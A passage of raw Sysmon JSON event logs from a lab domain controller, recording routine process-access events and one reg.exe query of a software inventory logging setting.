06:50:00.019","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2780,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2781,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2782,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2783,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2784,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2785,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.019\r\nSourceProcessGUID: {E2A3D6B1-1098-5F25-0000-00103DE00400}\r\nSourceProcessId: 4140\r\nSourceThreadId: 4132\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1098-5F25-0000-001035E20400}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.019","SourceProcessGUID":"{E2A3D6B1-1098-5F25-0000-00103DE00400}","SourceProcessId":"4140","SourceThreadId":"4132","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1098-5F25-0000-001035E20400}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2786,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.033\r\nProcessGuid: {E2A3D6B1-1098-5F25-0000-0010F5E20400}\r\nProcessId: 4164\r\nImage: C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: C:\\Windows\\system32\\reg.exe  query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352\r\nParentProcessGuid: {E2A3D6B1-1098-5F25-0000-001035E20400}\r\nParentProcessId: 4152\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.033","ProcessGuid":"{E2A3D6B1-1098-5F25-0000-0010F5E20400}","Image":"C:\\Windows\\System32\\reg.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Registry Console Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"reg.exe","CommandLine":"C:\\Windows\\system32\\reg.exe  query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352","ParentProcessGuid":"{E2A3D6B1-1098-5F25-0000-001035E20400}","ParentProcessId":"4152","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2787,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-1098-5F25-0000-001035E20400}\r\nSourceProcessId: 4152\r\nSourceThreadId: 4148\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1098-5F25-0000-0010F5E20400}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\system32\\reg.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-1098-5F25-0000-001035E20400}","SourceProcessId":"4152","SourceThreadId":"4148","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1098-5F25-0000-0010F5E20400}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\system32\\reg.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2788,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1098-5F25-0000-0010F5E20400}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\system32\\reg.exe\r\nGrantedAccess: 